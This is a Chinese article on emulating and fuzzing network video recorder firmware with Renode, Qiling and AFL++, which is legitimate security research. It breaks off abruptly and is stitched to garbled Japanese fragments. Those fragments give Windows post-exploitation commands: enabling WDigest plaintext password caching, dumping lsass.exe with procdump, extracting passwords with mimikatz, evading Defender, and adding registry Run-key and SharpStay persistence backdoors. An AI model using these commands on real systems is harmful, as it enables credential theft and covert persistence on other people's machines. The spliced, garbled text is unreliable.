在各種攻擊性安全技術中,在分析IoT/IIoT 設備的安全性時,漏洞評估是重中之重。在大多數情況下,此類設備是使用黑盒測試方法進行分析的,在這種方法中,研究人員實際上對研究對像一無所知。通常,這意味著設備固件的源代碼不可用,研究人員只能使用用戶手冊和一些用戶論壇上討論設備操作的幾個線程。
IoT/IIoT 設備的漏洞評估基於對其固件的分析。它分幾個階段執行:準備固件(提取和解包),從研究人員的角度搜索感興趣的組件,在模擬器中運行固件或其部件,最後搜索漏洞。在最後階段使用了多種技術,包括靜態和動態分析以及模糊測試。
分析設備固件的傳統方法是將QEMU 仿真器與GNU 調試器結合使用。我們決定討論其他不太明顯的固件處理工具,包括Renode 和Qiling。這些工具中的每一個都有其自身的特性、優勢和局限性,使其對某些類型的任務有效。
Renode 是一種旨在模擬整個系統的工具,包括內存芯片、傳感器、顯示器和其他外圍設備。它還可以模擬多個處理器(在多處理器設備上)之間的交互,每個處理器都可以有自己的架構和固件。 Renode 還可以將仿真硬件與實現為可編程邏輯設備(FPGA 芯片)的真實硬件互連。
Qiling 是一個用於模擬可執行文件的高級多平台框架。它可以模擬多種操作系統和環境,包括不同成熟度的Windows、MacOS、Linux、QNX、BSD、UEFI、DOS、MBR 和以太坊虛擬機。它支持x86、x86_64、ARM、ARM64、MIPS 和8086 架構和各種可執行文件格式。它還可以模擬MBR 加載過程。
我們選擇了一個現實世界的設備,一個主要製造商的網絡錄像機,作為我們研究的對象。該設備基於海思平台,運行Linux。
從製造商網站下載的固件包含一個文件,其中binwalk 工具檢測到CramFS 文件系統。解壓文件後,我們發現uImage——Linux 內核和initramfs 的組合映像——以及幾個加密腳本和TAR 檔案。
DECIMALHEXADECIMALDESCRIPTION
--------------------------------------------------------------------------------
00x0uImageheader,headersize:64bytes,headerCRC:0xCA9A1902,created:2019-08-2307:16:16,imagesize:4414954bytes,DataAddress:0x40008000 ,EntryPoint:0x40008000,dataCRC:0xDE0F30AC,OS:Linux,CPU:ARM,imagetype:OSKernelImage,compressiontype:none,imagename:'Linux-3.18.20'
640x40LinuxkernelARMbootexecutablezImage(little-endian)
24640x9A0devicetreeimage(dtb)
165600x40B0LZMAcompresseddata,properties:0x5D,dictionarysize:33554432bytes,uncompressedsize:-1bytes
44018480x432AB8devicetreeimage(dtb)
1
2
3
4
5
6
7
DECIMALHEXADECIMALDESCRIPTION
--------------------------------------------------------------------------------
00x0uImageheader,headersize:64bytes,headerCRC:0xCA9A1902,created:2019-08-2307:16:16,imagesize:4414954bytes,DataAddress:0x40008000 ,EntryPoint:0x40008000,dataCRC:0xDE0F30AC,OS:Linux,CPU:ARM,imagetype:OSKernelImage,compressiontype:none,imagename:'Linux-3.18.20'
640x40LinuxkernelARMbootexecutablezImage(little-endian)
24640x9A0devicetreeimage(dtb)
165600x40B0LZMAcompresseddata,properties:0x5D,dictionarysize:33554432bytes,uncompressedsize:-1bytes
44018480x432AB8devicetreeimage(dtb)下面,我們從系統層面看一下Renode和Qiling的運行情況。
有關在應用程序級別使用這些工具的信息(以錄像機的固件為例),請參閱文章的完整版本。
使用Renode 的系統級仿真Renode 是一個完整的系統仿真實用程序,其開發人員主要將其定位為旨在簡化嵌入式軟件開發、調試和自動化測試的工具。但是,它也可以用作動態分析工具,在漏洞評估期間分析系統的行為。 Renode 可用於運行小型嵌入式實時操作系統和成熟的操作系統,如Linux 或QNX。該模擬器大部分是用C# 編寫的,因此它的功能可以相對較快地適應研究人員的需求。
描述模擬平台作為單芯片系統一部分的外圍設備通常可通過內存映射I/O (MMIO) 獲得——相應外圍模塊的寄存器映射到的物理內存區域。 Renode 提供了使用帶有.repl(RE節點PL格式)擴展名的配置文件從構建塊構建片上系統的能力,該文件描述了哪些設備應該映射到哪些內存地址。
有關可用外圍設備和所用平台的內存映射的信息可以在SoC 文檔(如果公開)中找到。如果文檔不可用,則可以通過分析設備樹Blob (DTB) 的內容來找到此信息,DTB 是描述Linux 內核在嵌入式設備上運行Linux 所需的平台的數據塊。
在正在分析的固件中,DTB 塊附加到uImage 文件的末尾(根據binwalk 工具的信息)。使用dtc 工具將DTB 轉換為可讀格式(DTS)後,我們可以使用它為Renode 創建平台描述。
開始仿真必須準備一個初始化腳本,以便在REPL 文件中描述的平台上運行一些有用的東西。該腳本通常將可執行代碼加載到虛擬內存中,配置處理器寄存器,設置額外的事件處理程序,配置調試消息的輸出(如果需要)等。
:name:HiSilicon
:description:TorunLinuxonHiSilicon
usingsysbus
$name?='HiSilicon'
machcreate$name
machineLoadPlatformDescription@platforms/cpus/hisilicon.repl
logLevel0
###createexternals###
showAnalyzersysbus.uart0
###redirectmemoryforLinux###
sysbusRedirect0xC00000000x400000000x8000000
###loadbinaries###
sysbusLoadBinary'/home/research/digicap.out/uImage'0x40008000
sysbusLoadAtags'console=ttyS0,115200mem=128M@0x40000000nosmpmaxcpus=0'0x80000000x40000100
###setregisters###
cpuSetRegisterUnsafe20x40000100#atags
cpuPC0x40008040
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
:name:HiSilicon
:description:TorunLinuxonHiSilicon
usingsysbus
$name?='HiSilicon'
machcreate$name
machineLoadPlatformDescription@platforms/cpus/hisilicon.repl
logLevel0
###createexternals###
showAnalyzersysbus.uart0
###redirectmemoryforLinux###
sysbusRedirect0xC00000000x400000000x8000000
###loadbinaries###
sysbusLoadBinary'/home/research/digicap.out/uImage'0x40008000
sysbusLoadAtags'console=ttyS0,115200mem=128M@0x40000000nosmpmaxcpus=0'0x80000000x40000100
###setregisters###
cpuSetRegisterUnsafe20x40000100#atags
cpuPC0x40008040該腳本將uImage 文件加載到平台內存中的binwalk 輸出地址,配置內核參數,並將控制權傳遞給地址0x40008040,因為前0x40 字節由uImage 標頭獲取。
開始仿真後,我們得到了一個功能齊全的終端,我們可以與它進行交互,就像我們在任何Linux 系統上的終端一樣:
Renode 模擬器提供了足夠的功能來快速開始對正在研究的固件進行動態分析。作為一個動手示例,我們能夠部分運行網絡視頻錄像機的固件,而無需實際手頭有錄像機。在接下來的步驟中,我們可以使用模擬文件系統中可用的工具來解密加密的固件文件,提取提供記錄器功能的內核模塊並分析它們的邏輯等。
由於Renode 仿真器為基於ARM 架構的片上系統中常用的外設提供了足夠廣泛的支持,因此無需編寫任何額外代碼即可查看功能齊全的Linux 終端。同時,在必要時,仿真器的模塊化架構及其腳本和插件編寫功能使得在足以進行研究的水平上實現對任何缺乏功能的支持變得相對容易。
該工具的顯著特點之一是它使用系統級仿真。因此,很難使用它來模糊測試或調試在模擬操作系統中運行的用戶空間應用程序。
該工具的缺點包括缺乏詳細的文檔,現有文檔僅描述了最基本的使用場景。在實現更複雜的東西時,例如新的外圍設備,或者試圖了解特定內置命令的工作原理時,您必須反复參考GitHub 上的項目存儲庫並研究模擬器本身和捆綁的源代碼外圍設備。
使用Qiling 框架進行模糊測試Qiling 框架是用Python 編寫的,這使得根據研究人員的特定需求調整其功能非常容易。麒麟框架底層有獨角獸引擎,它只是一個機器指令的模擬器,而麒麟提供了許多高級功能,例如從文件系統中讀取文件、加載動態庫等。
與QEMU 相比,Qiling Framework 可以模擬更多平台,並提供靈活的模擬過程配置,包括即時修改執行代碼的能力。此外,它是一個跨平台框架,這意味著它可以用來在Linux 上模擬Windows 或QNX 可執行文件,反之亦然。
作為演示的一部分,我們將嘗試使用Qiling 模糊測試hrsaverify 實用程序,它是我們正在分析的固件的一部分,使用AFL++,一個用於驗證加密文件的實用程序,它將文件的路徑用於被驗證為論據。 Qiling 框架在其存儲庫的示例/fuzzing 目錄中已經有幾個運行AFL++ fuzzer 的示例。我們將修改名為linux_x8664 的示例以運行hrsaverify。運行fuzzer 的修改腳本如下所示:
importunicornaflasUcAfl
UcAfl.monkeypatch()
importos,sys
fromtypingimportAny,Optional
sys.path.append('././.')
fromqilingimportQiling
fromqiling.constimportQL_VERBOSE
fromqiling.extensionsimportpipe
defmain(input_file:str):
ql=Qiling(['././rootfs/hikroot/usr/bin/hrsaverify','/test'],'././rootfs/hikroot',
verbose=QL_VERBOSE.OFF,#keepqilingloggingoff
console=False,#thwartprogramoutput
stdin=None,stdout=None,stderr=None)#don'tcareaboutstdin/stdout
defplace_input_callback(uc:UcAfl.Uc,input:bytes,persistent_round:int,data:Any)-Optional[bool]:
'''Calledwitheverynewlygeneratedinput.'''
withopen('././rootfs/hikroot/test','wb')asf:
f.write(input)
defstart_afl(_ql:Qiling):
'''Callbackfrominside.'''
#WestartourAFLforkserverorrunonceifAFLisnotavailable.
#Thiswillonlyreturnafterthefuzzingstopped.
try:
ifnot_ql.uc.afl_fuzz(input_file=input_file,
place_input_callback=place_input_callback,exits=[ql.os.exit_point]):
_ql.log.warning('RanoncewithoutAFLattached')
os._exit(0)
exceptUcAfl.UcAflErrorasex:
ifex.errno!=UcAfl.UC_AFL_RET_CALLED_TWICE:
raise
#Imagebaseaddress
ba=0x10000
#Setahookonmain()toletunicornforkandstartinstrumentation
ql.hook_address(callback=start_afl,address=ba+0x8d8)
#Okay,readytoroll
ql.run()
if__name__=='__main__':
iflen(sys.argv)==1:
raiseValueError('Noinputfileprovided.')
main(sys.argv[1])
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
importunicornaflasUcAfl
UcAfl.monkeypatch()
importos,sys
fromtypingimportAny,Optional
sys.path.append('././.')
fromqilingimportQiling
fromqiling.constimportQL_VERBOSE
fromqiling.extensionsimportpipe
defmain(input_file:str):
ql=Qiling(['././rootfs/hikroot/usr/bin/hrsaverify','/test'],'././rootfs/hikroot',
verbose=QL_VERBOSE.OFF,#keepqilingloggingoff
console=False,#thwartprogramoutput
stdin=None,stdout=None,stderr=None)#don'tcareaboutstdin/stdout
defplace_input_callback(uc:UcAfl.Uc,input:bytes,persistent_round:int,data:Any)-Optional[bool]:
'''Calledwitheverynewlygeneratedinput.'''
withopen('././rootfs/hikroot/test','wb')asf:
f.write(input)
defstart_afl(_ql:Qiling):
'''Callbackfrominside.'''
#WestartourAFLforkserverorrunonceifAFLisnotavailable.
#Thiswillonlyreturnafterthefuzzingstopped.
try:
ifnot_ql.uc.afl_fuzz(input_file=input_file,
place_input_callback=place_input_callback,exits=[ql.os.exit_point]):
_ql.log.warning('RanoncewithoutAFLattached')
os._exit(0)
exceptUcAfl.UcAflErrorasex:
ifex.errno!=UcAfl.UC_AFL_RET_CALLED_TWICE:
raise
#Imagebaseaddress
ba=0x10000
#Setahookonmain()toletunicornforkandstartinstrumentation
ql.hook_address(callback=start_afl,address=ba+0x8d8)
#Okay,readytoroll
ql.run()
if__name__=='__main__':
iflen(sys.argv)==1:
raiseValueError('Noinputfileprovided.')
main(sys.argv[1])我們首先要查找的是可執行文件的基地址(在我們的例子中為0x10000),即主函數的地址。有時需要在其他地址上額外設置鉤子,當遇到這些地址時,模糊器應將其視為崩潰。例如,在QNX 環境中(在qnx_arm 目錄中)運行AFL 時,為libc 中SignalKill 函數的地址設置了這種類型的附加處理程序。在hrsaverify 的情況下,不需要額外的處理程序。還應該記住,所有必須對正在運行的應用程序可用的文件都應該放在sysroot 中,並且應該傳遞它們的相對路徑(在這種情況下,/./rootfs/hikroot/)。
AFL++ 使用以下命令啟動:
AFL_AUTORESUME=1AFL_PATH='$(realpath./AFLplusplus)'PATH='$AFL_PATH:$PATH'afl-fuzz-iafl_inputs-oafl_outputs-U--python./fuzz_arm_linux.py@@
1
AFL_AUTORESUME=1AFL_PATH='$(realpath./AFLplusplus)'PATH='$AFL_PATH:$PATH'afl-fuzz-iafl_inputs-oafl_outputs-U--
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
Rememberme=Deletemeフィールドを見ると、Shiro Deserializationの脆弱性
44444444があると言えます。
を起動します
を開きます
に表示されます
を選択します
を追加しました
を通過するすべてのトラフィックを受動的にスキャンする
LSA保護をオフにします。このログインのプレーンテキストパスワードは、LSASS.EXEプロセスに保存されます。 Mimikatzを使用して再びクロールして、Plantextパスワードを表示します。レジストリを復元すると、1から0を直接変更できます。コマンドの変更:reg hklm \ system \ currentControlset \ control \ securityproviders \ wdigest /v uselogoncredentient /t reg_dword /d 1 /f 
したがって、ミミカッツのために殺さない場合、たとえ静的すぎても、ハッシュアクションをバイパスするためにさまざまな姿勢を考慮する必要がありますが、これには間違いなく多くの時間がかかります。したがって、lsass.exeに保存されているプレーンテキストパスワードを取り出すことを検討し、ローカルミミカッツを介してパスワードを取得できます。実装:LSA保護がオフになり、管理者の権利が使用され、Microsoft Project Procdumpを使用してダンピングを使用しています(Microsoftプロジェクトであるため、EDRは毒を報告しません)、LSASSプロセスに保存されているパスワード情報を取得し、niuma.dmpとして保存します。 Procdumpプロジェクトアドレス:https://Learn.microsoft.com/zh-cn/sysinternals/downloads/procdumpコマンド:procdump.exe -ma lsass.exe niuma.dmpこの時点で、情報はローカル環境でMimikatzと同じディレクトリに引き込まれているため、通常のユーザー許可はniuma.dmpのプレーンテキストパスワードを直接読み取ることができます。ステップ1:sekurlsa3:3360minidump niuma.dmpステップ2:sekurlsa3:logonpasswordsフル
したがって、メモリストレージのDLL干渉を介してストレージを暗号化して、WDをバイパスする必要があります。
リポスト
レジストリスタートアップバックドアファイルReg Add hklm \ Software \ Microsoft \ Windows \ currentversion \ run /v 
または
3.sharpstay.exe自動化タスクはSharpStay.exe Action=Debug Command='C3: \ Windows 
